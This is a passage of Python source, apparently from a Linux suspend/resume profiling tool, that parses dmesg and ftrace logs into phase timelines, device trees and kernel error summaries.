return ret
elif cmd == 'stat':
fp = Popen(xset.format('q').split(' '), stdout=PIPE).stdout
ret = 'unknown'
for line in fp:
m = re.match('[\s]*Monitor is (?P<m>.*)', ascii(line))
if(m and len(m.group('m')) >= 2):
out = m.group('m').lower()
ret = out[3:] if out[0:2] == 'in' else out
break
fp.close()
return ret
def setRuntimeSuspend(self, before=True):
if before:
# runtime suspend disable or enable
if self.rs > 0:
self.rstgt, self.rsval, self.rsdir = 'on', 'auto', 'enabled'
else:
self.rstgt, self.rsval, self.rsdir = 'auto', 'on', 'disabled'
pprint('CONFIGURING RUNTIME SUSPEND...')
self.rslist = deviceInfo(self.rstgt)
for i in self.rslist:
self.setVal(self.rsval, i)
pprint('runtime suspend %s on all devices (%d changed)' % (self.rsdir, len(self.rslist)))
pprint('waiting 5 seconds...')
time.sleep(5)
else:
# runtime suspend re-enable or re-disable
for i in self.rslist:
self.setVal(self.rstgt, i)
pprint('runtime suspend settings restored on %d devices' % len(self.rslist))
sysvals = SystemValues()
switchvalues = ['enable', 'disable', 'on', 'off', 'true', 'false', '1', '0']
switchoff = ['disable', 'off', 'false', '0']
suspendmodename = {
'freeze': 'Freeze (S0)',
'standby': 'Standby (S1)',
'mem': 'Suspend (S3)',
'disk': 'Hibernate (S4)'
}
# Class: DevProps
# Description:
# Simple class which holds property values collected
# for all the devices used in the timeline.
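# Each device is serialized by out() as "name,altname,isasync;", so a devinfo
# line is these fields concatenated for every device, e.g.
# "0000:00:14.0,xHCI Host Controller,1;" (example values are hypothetical).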
class DevProps:
def __init__(self):
self.syspath = ''
self.altname = ''
self.isasync = True
self.xtraclass = ''
self.xtrainfo = ''
def out(self, dev):
return '%s,%s,%d;' % (dev, self.altname, self.isasync)
def debug(self, dev):
pprint('%s:\n\taltname = %s\n\t async = %s' % (dev, self.altname, self.isasync))
def altName(self, dev):
if not self.altname or self.altname == dev:
return dev
return '%s [%s]' % (self.altname, dev)
def xtraClass(self):
if self.xtraclass:
return ' '+self.xtraclass
if not self.isasync:
return ' sync'
return ''
def xtraInfo(self):
if self.xtraclass:
return ' '+self.xtraclass
if self.isasync:
return ' (async)'
return ' (sync)'
# Class: DeviceNode
# Description:
#	 A container used to create a device hierarchy, with a single root node
# and a tree of child nodes. Used by Data.deviceTopology()
class DeviceNode:
def __init__(self, nodename, nodedepth):
self.name = nodename
self.children = []
self.depth = nodedepth
# Class: Data
# Description:
# The primary container for suspend/resume test data. There is one for
#	 each test run. The data is organized into a chronological hierarchy:
# Data.dmesg {
# phases {
# 10 sequential, non-overlapping phases of S/R
# contents: times for phase start/end, order/color data for html
# devlist {
# device callback or action list for this phase
# device {
# a single device callback or generic action
# contents: start/stop times, pid/cpu/driver info
# parents/children, html id for timeline/callgraph
# optionally includes an ftrace callgraph
# optionally includes dev/ps data
# }
# }
# }
# }
#
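# A minimal access sketch (keys are the real dict fields, the device name and
# values are hypothetical):
#   data.dmesg['suspend']['start']                    # phase start time (sec)
#   data.dmesg['suspend']['list']['usb1']['length']   # device callback length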
class Data:
phasedef = {
'suspend_prepare': {'order': 0, 'color': '#CCFFCC'},
'suspend': {'order': 1, 'color': '#88FF88'},
'suspend_late': {'order': 2, 'color': '#00AA00'},
'suspend_noirq': {'order': 3, 'color': '#008888'},
'suspend_machine': {'order': 4, 'color': '#0000FF'},
'resume_machine': {'order': 5, 'color': '#FF0000'},
'resume_noirq': {'order': 6, 'color': '#FF9900'},
'resume_early': {'order': 7, 'color': '#FFCC00'},
'resume': {'order': 8, 'color': '#FFFF88'},
'resume_complete': {'order': 9, 'color': '#FFFFCC'},
}
errlist = {
'HWERROR' : r'.*\[ *Hardware Error *\].*',
'FWBUG' : r'.*\[ *Firmware Bug *\].*',
'BUG' : r'(?i).*\bBUG\b.*',
'ERROR' : r'(?i).*\bERROR\b.*',
'WARNING' : r'(?i).*\bWARNING\b.*',
'FAULT' : r'(?i).*\bFAULT\b.*',
'FAIL' : r'(?i).*\bFAILED\b.*',
'INVALID' : r'(?i).*\bINVALID\b.*',
'CRASH' : r'(?i).*\bCRASHED\b.*',
'TIMEOUT' : r'(?i).*\bTIMEOUT\b.*',
'IRQ' : r'.*\bgenirq: .*',
'TASKFAIL': r'.*Freezing of tasks *.*',
'ACPI' : r'.*\bACPI *(?P<b>[A-Za-z]*) *Error[: ].*',
'DISKFULL': r'.*\bNo space left on device.*',
'USBERR' : r'.*usb .*device .*, error [0-9-]*',
'ATAERR' : r' *ata[0-9\.]*: .*failed.*',
'MEIERR' : r' *mei.*: .*failed.*',
'TPMERR' : r'(?i) *tpm *tpm[0-9]*: .*error.*',
}
def __init__(self, num):
idchar = 'abcdefghij'
self.start = 0.0 # test start
self.end = 0.0 # test end
self.hwstart = 0 # rtc test start
self.hwend = 0 # rtc test end
self.tSuspended = 0.0 # low-level suspend start
self.tResumed = 0.0 # low-level resume start
self.tKernSus = 0.0 # kernel level suspend start
self.tKernRes = 0.0 # kernel level resume end
self.fwValid = False # is firmware data available
self.fwSuspend = 0 # time spent in firmware suspend
self.fwResume = 0 # time spent in firmware resume
self.html_device_id = 0
self.stamp = 0
self.outfile = ''
self.kerror = False
self.wifi = dict()
self.turbostat = 0
self.enterfail = ''
self.currphase = ''
self.pstl = dict() # process timeline
self.testnumber = num
self.idstr = idchar[num]
self.dmesgtext = [] # dmesg text file in memory
self.dmesg = dict() # root data structure
self.errorinfo = {'suspend':[],'resume':[]}
self.tLow = [] # time spent in low-level suspends (standby/freeze)
self.devpids = []
self.devicegroups = 0
def sortedPhases(self):
return sorted(self.dmesg, key=lambda k:self.dmesg[k]['order'])
def initDevicegroups(self):
# called when phases are all finished being added
for phase in sorted(self.dmesg.keys()):
if '*' in phase:
p = phase.split('*')
pnew = '%s%d' % (p[0], len(p))
self.dmesg[pnew] = self.dmesg.pop(phase)
self.devicegroups = []
for phase in self.sortedPhases():
self.devicegroups.append([phase])
def nextPhase(self, phase, offset):
order = self.dmesg[phase]['order'] + offset
for p in self.dmesg:
if self.dmesg[p]['order'] == order:
return p
return ''
def lastPhase(self, depth=1):
plist = self.sortedPhases()
if len(plist) < depth:
return ''
return plist[-1*depth]
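	# turbostatInfo pulls the SYS%LPI and package C10 residency values out of
	# the stored "# turbostat" log line and returns them as percentage strings.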
def turbostatInfo(self):
tp = TestProps()
out = {'syslpi':'N/A','pkgpc10':'N/A'}
for line in self.dmesgtext:
m = re.match(tp.tstatfmt, line)
if not m:
continue
for i in m.group('t').split('|'):
if 'SYS%LPI' in i:
out['syslpi'] = i.split('=')[-1]+'%'
elif 'pc10' in i:
out['pkgpc10'] = i.split('=')[-1]+'%'
break
return out
def extractErrorInfo(self):
lf = self.dmesgtext
if len(self.dmesgtext) < 1 and sysvals.dmesgfile:
lf = sysvals.openlog(sysvals.dmesgfile, 'r')
i = 0
tp = TestProps()
list = []
for line in lf:
i += 1
if tp.stampInfo(line, sysvals):
continue
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if not m:
continue
t = float(m.group('ktime'))
if t < self.start or t > self.end:
continue
dir = 'suspend' if t < self.tSuspended else 'resume'
msg = m.group('msg')
if re.match('capability: warning: .*', msg):
continue
for err in self.errlist:
if re.match(self.errlist[err], msg):
list.append((msg, err, dir, t, i, i))
self.kerror = True
break
tp.msglist = []
for msg, type, dir, t, idx1, idx2 in list:
tp.msglist.append(msg)
self.errorinfo[dir].append((type, t, idx1, idx2))
if self.kerror:
sysvals.dmesglog = True
if len(self.dmesgtext) < 1 and sysvals.dmesgfile:
lf.close()
return tp
def setStart(self, time, msg=''):
self.start = time
if msg:
try:
self.hwstart = datetime.strptime(msg, sysvals.tmstart)
except:
self.hwstart = 0
def setEnd(self, time, msg=''):
self.end = time
if msg:
try:
self.hwend = datetime.strptime(msg, sysvals.tmend)
except:
self.hwend = 0
def isTraceEventOutsideDeviceCalls(self, pid, time):
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for dev in list:
d = list[dev]
if(d['pid'] == pid and time >= d['start'] and
time < d['end']):
return False
return True
def sourcePhase(self, start):
for phase in self.sortedPhases():
if 'machine' in phase:
continue
pend = self.dmesg[phase]['end']
if start <= pend:
return phase
return 'resume_complete'
def sourceDevice(self, phaselist, start, end, pid, type):
tgtdev = ''
for phase in phaselist:
list = self.dmesg[phase]['list']
for devname in list:
dev = list[devname]
# pid must match
if dev['pid'] != pid:
continue
devS = dev['start']
devE = dev['end']
if type == 'device':
# device target event is entirely inside the source boundary
if(start < devS or start >= devE or end <= devS or end > devE):
continue
elif type == 'thread':
# thread target event will expand the source boundary
if start < devS:
dev['start'] = start
if end > devE:
dev['end'] = end
tgtdev = dev
break
return tgtdev
def addDeviceFunctionCall(self, displayname, kprobename, proc, pid, start, end, cdata, rdata):
# try to place the call in a device
phases = self.sortedPhases()
tgtdev = self.sourceDevice(phases, start, end, pid, 'device')
# calls with device pids that occur outside device bounds are dropped
# TODO: include these somehow
if not tgtdev and pid in self.devpids:
return False
# try to place the call in a thread
if not tgtdev:
tgtdev = self.sourceDevice(phases, start, end, pid, 'thread')
# create new thread blocks, expand as new calls are found
if not tgtdev:
if proc == '<...>':
threadname = 'kthread-%d' % (pid)
else:
threadname = '%s-%d' % (proc, pid)
tgtphase = self.sourcePhase(start)
self.newAction(tgtphase, threadname, pid, '', start, end, '', ' kth', '')
return self.addDeviceFunctionCall(displayname, kprobename, proc, pid, start, end, cdata, rdata)
# this should not happen
if not tgtdev:
sysvals.vprint('[%f - %f] %s-%d %s %s %s' % \
(start, end, proc, pid, kprobename, cdata, rdata))
return False
# place the call data inside the src element of the tgtdev
if('src' not in tgtdev):
tgtdev['src'] = []
dtf = sysvals.dev_tracefuncs
ubiquitous = False
if kprobename in dtf and 'ub' in dtf[kprobename]:
ubiquitous = True
title = cdata+' '+rdata
mstr = '\(.*\) *(?P<args>.*) *\((?P<caller>.*)\+.* arg1=(?P<ret>.*)'
m = re.match(mstr, title)
if m:
c = m.group('caller')
a = m.group('args').strip()
r = m.group('ret')
if len(r) > 6:
r = ''
else:
r = 'ret=%s ' % r
if ubiquitous and c in dtf and 'ub' in dtf[c]:
return False
color = sysvals.kprobeColor(kprobename)
e = DevFunction(displayname, a, c, r, start, end, ubiquitous, proc, pid, color)
tgtdev['src'].append(e)
return True
def overflowDevices(self):
# get a list of devices that extend beyond the end of this test run
devlist = []
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for devname in list:
dev = list[devname]
if dev['end'] > self.end:
devlist.append(dev)
return devlist
def mergeOverlapDevices(self, devlist):
# merge any devices that overlap devlist
for dev in devlist:
devname = dev['name']
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
if devname not in list:
continue
tdev = list[devname]
o = min(dev['end'], tdev['end']) - max(dev['start'], tdev['start'])
if o <= 0:
continue
dev['end'] = tdev['end']
if 'src' not in dev or 'src' not in tdev:
continue
dev['src'] += tdev['src']
del list[devname]
def usurpTouchingThread(self, name, dev):
		# the caller test has priority over this thread, so transfer it to the caller
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
if name in list:
tdev = list[name]
if tdev['start'] - dev['end'] < 0.1:
dev['end'] = tdev['end']
if 'src' not in dev:
dev['src'] = []
if 'src' in tdev:
dev['src'] += tdev['src']
del list[name]
break
def stitchTouchingThreads(self, testlist):
# merge any threads between tests that touch
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for devname in list:
dev = list[devname]
if 'htmlclass' not in dev or 'kth' not in dev['htmlclass']:
continue
for data in testlist:
data.usurpTouchingThread(devname, dev)
def optimizeDevSrc(self):
# merge any src call loops to reduce timeline size
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for dev in list:
if 'src' not in list[dev]:
continue
src = list[dev]['src']
p = 0
for e in sorted(src, key=lambda event: event.time):
if not p or not e.repeat(p):
p = e
continue
# e is another iteration of p, move it into p
p.end = e.end
p.length = p.end - p.time
p.count += 1
src.remove(e)
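	# trimTimeVal removes a window of dead clock time [t0, t0+dT] from a
	# timestamp: values inside the window collapse onto the window edge, and
	# values on one side of it are shifted by dT so the timeline closes up
	# around the gap. 'left' selects which side moves (times after the window
	# when True, times before it when False).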
def trimTimeVal(self, t, t0, dT, left):
if left:
if(t > t0):
if(t - dT < t0):
return t0
return t - dT
else:
return t
else:
if(t < t0 + dT):
if(t > t0):
return t0 + dT
return t + dT
else:
return t
def trimTime(self, t0, dT, left):
self.tSuspended = self.trimTimeVal(self.tSuspended, t0, dT, left)
self.tResumed = self.trimTimeVal(self.tResumed, t0, dT, left)
self.start = self.trimTimeVal(self.start, t0, dT, left)
self.tKernSus = self.trimTimeVal(self.tKernSus, t0, dT, left)
self.tKernRes = self.trimTimeVal(self.tKernRes, t0, dT, left)
self.end = self.trimTimeVal(self.end, t0, dT, left)
for phase in self.sortedPhases():
p = self.dmesg[phase]
p['start'] = self.trimTimeVal(p['start'], t0, dT, left)
p['end'] = self.trimTimeVal(p['end'], t0, dT, left)
list = p['list']
for name in list:
d = list[name]
d['start'] = self.trimTimeVal(d['start'], t0, dT, left)
d['end'] = self.trimTimeVal(d['end'], t0, dT, left)
d['length'] = d['end'] - d['start']
if('ftrace' in d):
cg = d['ftrace']
cg.start = self.trimTimeVal(cg.start, t0, dT, left)
cg.end = self.trimTimeVal(cg.end, t0, dT, left)
for line in cg.list:
line.time = self.trimTimeVal(line.time, t0, dT, left)
if('src' in d):
for e in d['src']:
e.time = self.trimTimeVal(e.time, t0, dT, left)
e.end = self.trimTimeVal(e.end, t0, dT, left)
e.length = e.end - e.time
for dir in ['suspend', 'resume']:
list = []
for e in self.errorinfo[dir]:
type, tm, idx1, idx2 = e
tm = self.trimTimeVal(tm, t0, dT, left)
list.append((type, tm, idx1, idx2))
self.errorinfo[dir] = list
def trimFreezeTime(self, tZero):
# trim out any standby or freeze clock time
lp = ''
for phase in self.sortedPhases():
if 'resume_machine' in phase and 'suspend_machine' in lp:
tS, tR = self.dmesg[lp]['end'], self.dmesg[phase]['start']
tL = tR - tS
if tL <= 0:
continue
left = True if tR > tZero else False
self.trimTime(tS, tL, left)
if 'waking' in self.dmesg[lp]:
tCnt = self.dmesg[lp]['waking'][0]
if self.dmesg[lp]['waking'][1] >= 0.001:
tTry = '-%.0f' % (round(self.dmesg[lp]['waking'][1] * 1000))
else:
tTry = '-%.3f' % (self.dmesg[lp]['waking'][1] * 1000)
text = '%.0f (%s ms waking %d times)' % (tL * 1000, tTry, tCnt)
else:
text = '%.0f' % (tL * 1000)
self.tLow.append(text)
lp = phase
def getMemTime(self):
if not self.hwstart or not self.hwend:
return
stime = (self.tSuspended - self.start) * 1000000
rtime = (self.end - self.tResumed) * 1000000
hws = self.hwstart + timedelta(microseconds=stime)
hwr = self.hwend - timedelta(microseconds=rtime)
self.tLow.append('%.0f'%((hwr - hws).total_seconds() * 1000))
def getTimeValues(self):
sktime = (self.tSuspended - self.tKernSus) * 1000
rktime = (self.tKernRes - self.tResumed) * 1000
return (sktime, rktime)
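	# setPhase opens or closes a phase at the given kernel time. A phase name
	# that repeats (multiple suspend/resume cycles in one trace) gets a '*'
	# appended to keep its dmesg key unique; initDevicegroups later renames
	# these to "<phase>N".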
def setPhase(self, phase, ktime, isbegin, order=-1):
if(isbegin):
# phase start over current phase
if self.currphase:
if 'resume_machine' not in self.currphase:
sysvals.vprint('WARNING: phase %s failed to end' % self.currphase)
self.dmesg[self.currphase]['end'] = ktime
phases = self.dmesg.keys()
color = self.phasedef[phase]['color']
count = len(phases) if order < 0 else order
# create unique name for every new phase
while phase in phases:
phase += '*'
self.dmesg[phase] = {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': color, 'order': count}
self.dmesg[phase]['start'] = ktime
self.currphase = phase
else:
# phase end without a start
if phase not in self.currphase:
if self.currphase:
sysvals.vprint('WARNING: %s ended instead of %s, ftrace corruption?' % (phase, self.currphase))
else:
sysvals.vprint('WARNING: %s ended without a start, ftrace corruption?' % phase)
return phase
phase = self.currphase
self.dmesg[phase]['end'] = ktime
self.currphase = ''
return phase
def sortedDevices(self, phase):
list = self.dmesg[phase]['list']
return sorted(list, key=lambda k:list[k]['start'])
def fixupInitcalls(self, phase):
# if any calls never returned, clip them at system resume end
phaselist = self.dmesg[phase]['list']
for devname in phaselist:
dev = phaselist[devname]
if(dev['end'] < 0):
for p in self.sortedPhases():
if self.dmesg[p]['end'] > dev['start']:
dev['end'] = self.dmesg[p]['end']
break
				sysvals.vprint('%s (%s): callback did not return' % (devname, phase))
def deviceFilter(self, devicefilter):
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
rmlist = []
for name in list:
keep = False
for filter in devicefilter:
if filter in name or \
('drv' in list[name] and filter in list[name]['drv']):
keep = True
if not keep:
rmlist.append(name)
for name in rmlist:
del list[name]
def fixupInitcallsThatDidntReturn(self):
# if any calls never returned, clip them at system resume end
for phase in self.sortedPhases():
self.fixupInitcalls(phase)
def phaseOverlap(self, phases):
rmgroups = []
newgroup = []
for group in self.devicegroups:
for phase in phases:
if phase not in group:
continue
for p in group:
if p not in newgroup:
newgroup.append(p)
if group not in rmgroups:
rmgroups.append(group)
for group in rmgroups:
self.devicegroups.remove(group)
self.devicegroups.append(newgroup)
def newActionGlobal(self, name, start, end, pid=-1, color=''):
# which phase is this device callback or action in
phases = self.sortedPhases()
targetphase = 'none'
htmlclass = ''
overlap = 0.0
myphases = []
for phase in phases:
pstart = self.dmesg[phase]['start']
pend = self.dmesg[phase]['end']
# see if the action overlaps this phase
o = max(0, min(end, pend) - max(start, pstart))
if o > 0:
myphases.append(phase)
# set the target phase to the one that overlaps most
if o > overlap:
if overlap > 0 and phase == 'post_resume':
continue
targetphase = phase
overlap = o
# if no target phase was found, pin it to the edge
if targetphase == 'none':
p0start = self.dmesg[phases[0]]['start']
if start <= p0start:
targetphase = phases[0]
else:
targetphase = phases[-1]
if pid == -2:
htmlclass = ' bg'
elif pid == -3:
htmlclass = ' ps'
if len(myphases) > 1:
htmlclass = ' bg'
self.phaseOverlap(myphases)
if targetphase in phases:
newname = self.newAction(targetphase, name, pid, '', start, end, '', htmlclass, color)
return (targetphase, newname)
return False
def newAction(self, phase, name, pid, parent, start, end, drv, htmlclass='', color=''):
# new device callback for a specific phase
self.html_device_id += 1
devid = '%s%d' % (self.idstr, self.html_device_id)
list = self.dmesg[phase]['list']
length = -1.0
if(start >= 0 and end >= 0):
length = end - start
if pid == -2 or name not in sysvals.tracefuncs.keys():
i = 2
origname = name
while(name in list):
name = '%s[%d]' % (origname, i)
i += 1
list[name] = {'name': name, 'start': start, 'end': end, 'pid': pid,
'par': parent, 'length': length, 'row': 0, 'id': devid, 'drv': drv }
if htmlclass:
list[name]['htmlclass'] = htmlclass
if color:
list[name]['color'] = color
return name
def findDevice(self, phase, name):
list = self.dmesg[phase]['list']
mydev = ''
for devname in sorted(list):
if name == devname or re.match('^%s\[(?P<num>[0-9]*)\]$' % name, devname):
mydev = devname
if mydev:
return list[mydev]
return False
def deviceChildren(self, devname, phase):
devlist = []
list = self.dmesg[phase]['list']
for child in list:
if(list[child]['par'] == devname):
devlist.append(child)
return devlist
def maxDeviceNameSize(self, phase):
size = 0
for name in self.dmesg[phase]['list']:
if len(name) > size:
size = len(name)
return size
def printDetails(self):
sysvals.vprint('Timeline Details:')
sysvals.vprint(' test start: %f' % self.start)
sysvals.vprint('kernel suspend start: %f' % self.tKernSus)
tS = tR = False
for phase in self.sortedPhases():
devlist = self.dmesg[phase]['list']
dc, ps, pe = len(devlist), self.dmesg[phase]['start'], self.dmesg[phase]['end']
if not tS and ps >= self.tSuspended:
sysvals.vprint(' machine suspended: %f' % self.tSuspended)
tS = True
if not tR and ps >= self.tResumed:
sysvals.vprint(' machine resumed: %f' % self.tResumed)
tR = True
sysvals.vprint('%20s: %f - %f (%d devices)' % (phase, ps, pe, dc))
if sysvals.devdump:
sysvals.vprint(''.join('-' for i in range(80)))
maxname = '%d' % self.maxDeviceNameSize(phase)
fmt = '%3d) %'+maxname+'s - %f - %f'
c = 1
for name in sorted(devlist):
s = devlist[name]['start']
e = devlist[name]['end']
sysvals.vprint(fmt % (c, name, s, e))
c += 1
sysvals.vprint(''.join('-' for i in range(80)))
sysvals.vprint(' kernel resume end: %f' % self.tKernRes)
sysvals.vprint(' test end: %f' % self.end)
def deviceChildrenAllPhases(self, devname):
devlist = []
for phase in self.sortedPhases():
list = self.deviceChildren(devname, phase)
for dev in sorted(list):
if dev not in devlist:
devlist.append(dev)
return devlist
def masterTopology(self, name, list, depth):
node = DeviceNode(name, depth)
for cname in list:
# avoid recursions
if name == cname:
continue
clist = self.deviceChildrenAllPhases(cname)
cnode = self.masterTopology(cname, clist, depth+1)
node.children.append(cnode)
return node
def printTopology(self, node):
html = ''
if node.name:
info = ''
drv = ''
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
if node.name in list:
s = list[node.name]['start']
e = list[node.name]['end']
if list[node.name]['drv']:
drv = ' {'+list[node.name]['drv']+'}'
info += ('<li>%s: %.3fms</li>' % (phase, (e-s)*1000))
html += '<li><b>'+node.name+drv+'</b>'
if info:
html += '<ul>'+info+'</ul>'
html += '</li>'
if len(node.children) > 0:
html += '<ul>'
for cnode in node.children:
html += self.printTopology(cnode)
html += '</ul>'
return html
def rootDeviceList(self):
# list of devices graphed
real = []
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for dev in sorted(list):
if list[dev]['pid'] >= 0 and dev not in real:
real.append(dev)
# list of top-most root devices
rootlist = []
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for dev in sorted(list):
pdev = list[dev]['par']
pid = list[dev]['pid']
if(pid < 0 or re.match('[0-9]*-[0-9]*\.[0-9]*[\.0-9]*\:[\.0-9]*$', pdev)):
continue
if pdev and pdev not in real and pdev not in rootlist:
rootlist.append(pdev)
return rootlist
def deviceTopology(self):
rootlist = self.rootDeviceList()
master = self.masterTopology('', rootlist, 0)
return self.printTopology(master)
def selectTimelineDevices(self, widfmt, tTotal, mindevlen):
# only select devices that will actually show up in html
self.tdevlist = dict()
for phase in self.dmesg:
devlist = []
list = self.dmesg[phase]['list']
for dev in list:
length = (list[dev]['end'] - list[dev]['start']) * 1000
width = widfmt % (((list[dev]['end']-list[dev]['start'])*100)/tTotal)
if length >= mindevlen:
devlist.append(dev)
self.tdevlist[phase] = devlist
def addHorizontalDivider(self, devname, devend):
phase = 'suspend_prepare'
self.newAction(phase, devname, -2, '', \
self.start, devend, '', ' sec', '')
if phase not in self.tdevlist:
self.tdevlist[phase] = []
self.tdevlist[phase].append(devname)
d = DevItem(0, phase, self.dmesg[phase]['list'][devname])
return d
def addProcessUsageEvent(self, name, times):
# get the start and end times for this process
maxC = 0
tlast = 0
start = -1
end = -1
for t in sorted(times):
if tlast == 0:
tlast = t
continue
if name in self.pstl[t]:
if start == -1 or tlast < start:
start = tlast
if end == -1 or t > end:
end = t
tlast = t
if start == -1 or end == -1:
return 0
# add a new action for this process and get the object
out = self.newActionGlobal(name, start, end, -3)
if not out:
return 0
phase, devname = out
dev = self.dmesg[phase]['list'][devname]
# get the cpu exec data
tlast = 0
clast = 0
cpuexec = dict()
for t in sorted(times):
if tlast == 0 or t <= start or t > end:
tlast = t
continue
list = self.pstl[t]
c = 0
if name in list:
c = list[name]
if c > maxC:
maxC = c
if c != clast:
key = (tlast, t)
cpuexec[key] = c
tlast = t
clast = c
dev['cpuexec'] = cpuexec
return maxC
def createProcessUsageEvents(self):
# get an array of process names
proclist = []
for t in sorted(self.pstl):
pslist = self.pstl[t]
for ps in sorted(pslist):
if ps not in proclist:
proclist.append(ps)
# get a list of data points for suspend and resume
tsus = []
tres = []
for t in sorted(self.pstl):
if t < self.tSuspended:
tsus.append(t)
else:
tres.append(t)
# process the events for suspend and resume
if len(proclist) > 0:
sysvals.vprint('Process Execution:')
for ps in proclist:
c = self.addProcessUsageEvent(ps, tsus)
if c > 0:
sysvals.vprint('%25s (sus): %d' % (ps, c))
c = self.addProcessUsageEvent(ps, tres)
if c > 0:
sysvals.vprint('%25s (res): %d' % (ps, c))
def handleEndMarker(self, time, msg=''):
dm = self.dmesg
self.setEnd(time, msg)
self.initDevicegroups()
# give suspend_prepare an end if needed
if 'suspend_prepare' in dm and dm['suspend_prepare']['end'] < 0:
dm['suspend_prepare']['end'] = time
# assume resume machine ends at next phase start
if 'resume_machine' in dm and dm['resume_machine']['end'] < 0:
np = self.nextPhase('resume_machine', 1)
if np:
dm['resume_machine']['end'] = dm[np]['start']
		# if kernel resume end not found, assume it's the end marker
if self.tKernRes == 0.0:
self.tKernRes = time
		# if kernel suspend start not found, assume it's the end marker
if self.tKernSus == 0.0:
self.tKernSus = time
# set resume complete to end at end marker
if 'resume_complete' in dm:
dm['resume_complete']['end'] = time
def debugPrint(self):
for p in self.sortedPhases():
list = self.dmesg[p]['list']
for devname in sorted(list):
dev = list[devname]
if 'ftrace' in dev:
dev['ftrace'].debugPrint(' [%s]' % devname)
# Class: DevFunction
# Description:
# A container for kprobe function data we want in the dev timeline
class DevFunction:
def __init__(self, name, args, caller, ret, start, end, u, proc, pid, color):
self.row = 0
self.count = 1
self.name = name
self.args = args
self.caller = caller
self.ret = ret
self.time = start
self.length = end - start
self.end = end
self.ubiquitous = u
self.proc = proc
self.pid = pid
self.color = color
def title(self):
cnt = ''
if self.count > 1:
cnt = '(x%d)' % self.count
l = '%0.3fms' % (self.length * 1000)
if self.ubiquitous:
title = '%s(%s)%s <- %s, %s(%s)' % \
(self.name, self.args, cnt, self.caller, self.ret, l)
else:
title = '%s(%s) %s%s(%s)' % (self.name, self.args, self.ret, cnt, l)
return title.replace('"', '')
def text(self):
if self.count > 1:
text = '%s(x%d)' % (self.name, self.count)
else:
text = self.name
return text
def repeat(self, tgt):
# is the tgt call just a repeat of this call (e.g. are we in a loop)
dt = self.time - tgt.end
# only combine calls if -all- attributes are identical
if tgt.caller == self.caller and \
tgt.name == self.name and tgt.args == self.args and \
tgt.proc == self.proc and tgt.pid == self.pid and \
tgt.ret == self.ret and dt >= 0 and \
dt <= sysvals.callloopmaxgap and \
self.length < sysvals.callloopmaxlen:
return True
return False
# Class: FTraceLine
# Description:
# A container for a single line of ftrace data. There are six basic types:
# callgraph line:
# call: " dpm_run_callback() {"
# return: " }"
# leaf: " dpm_run_callback();"
# trace event:
# tracing_mark_write: SUSPEND START or RESUME COMPLETE
# suspend_resume: phase or custom exec block data
# device_pm_callback: device callback info
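# A hypothetical nop-format line as it appears in the raw ftrace log, before
# the time and message fields are handed to this class:
#   kworker/u16:7-1234  [002] ....  1001.234567: tracing_mark_write: SUSPEND START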
class FTraceLine:
def __init__(self, t, m='', d=''):
self.length = 0.0
self.fcall = False
self.freturn = False
self.fevent = False
self.fkprobe = False
self.depth = 0
self.name = ''
self.type = ''
self.time = float(t)
if not m and not d:
return
# is this a trace event
if(d == 'traceevent' or re.match('^ *\/\* *(?P<msg>.*) \*\/ *$', m)):
if(d == 'traceevent'):
# nop format trace event
msg = m
else:
# function_graph format trace event
em = re.match('^ *\/\* *(?P<msg>.*) \*\/ *$', m)
msg = em.group('msg')
emm = re.match('^(?P<call>.*?): (?P<msg>.*)', msg)
if(emm):
self.name = emm.group('msg')
self.type = emm.group('call')
else:
self.name = msg
km = re.match('^(?P<n>.*)_cal$', self.type)
if km:
self.fcall = True
self.fkprobe = True
self.type = km.group('n')
return
km = re.match('^(?P<n>.*)_ret$', self.type)
if km:
self.freturn = True
self.fkprobe = True
self.type = km.group('n')
return
self.fevent = True
return
# convert the duration to seconds
if(d):
self.length = float(d)/1000000
# the indentation determines the depth
match = re.match('^(?P<d> *)(?P<o>.*)$', m)
if(not match):
return
self.depth = self.getDepth(match.group('d'))
m = match.group('o')
# function return
if(m[0] == '}'):
self.freturn = True
if(len(m) > 1):
# includes comment with function name
match = re.match('^} *\/\* *(?P<n>.*) *\*\/$', m)
if(match):
self.name = match.group('n').strip()
# function call
else:
self.fcall = True
# function call with children
if(m[-1] == '{'):
match = re.match('^(?P<n>.*) *\(.*', m)
if(match):
self.name = match.group('n').strip()
# function call with no children (leaf)
elif(m[-1] == ';'):
self.freturn = True
match = re.match('^(?P<n>.*) *\(.*', m)
if(match):
self.name = match.group('n').strip()
# something else (possibly a trace marker)
else:
self.name = m
def isCall(self):
return self.fcall and not self.freturn
def isReturn(self):
return self.freturn and not self.fcall
def isLeaf(self):
return self.fcall and self.freturn
def getDepth(self, str):
		return len(str)//2
def debugPrint(self, info=''):
if self.isLeaf():
pprint(' -- %12.6f (depth=%02d): %s(); (%.3f us) %s' % (self.time, \
self.depth, self.name, self.length*1000000, info))
elif self.freturn:
pprint(' -- %12.6f (depth=%02d): %s} (%.3f us) %s' % (self.time, \
self.depth, self.name, self.length*1000000, info))
else:
pprint(' -- %12.6f (depth=%02d): %s() { (%.3f us) %s' % (self.time, \
self.depth, self.name, self.length*1000000, info))
def startMarker(self):
# Is this the starting line of a suspend?
if not self.fevent:
return False
if sysvals.usetracemarkers:
if(self.name.startswith('SUSPEND START')):
return True
return False
else:
if(self.type == 'suspend_resume' and
re.match('suspend_enter\[.*\] begin', self.name)):
return True
return False
def endMarker(self):
# Is this the ending line of a resume?
if not self.fevent:
return False
if sysvals.usetracemarkers:
if(self.name.startswith('RESUME COMPLETE')):
return True
return False
else:
if(self.type == 'suspend_resume' and
re.match('thaw_processes\[.*\] end', self.name)):
return True
return False
# Class: FTraceCallGraph
# Description:
# A container for the ftrace callgraph of a single recursive function.
# This can be a dpm_run_callback, dpm_prepare, or dpm_complete callgraph
# Each instance is tied to a single device in a single phase, and is
# comprised of an ordered list of FTraceLine objects
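# addLine() grows the graph one FTraceLine at a time and reports progress via
# its return value: 0 means keep adding lines, 1 means the graph completed at
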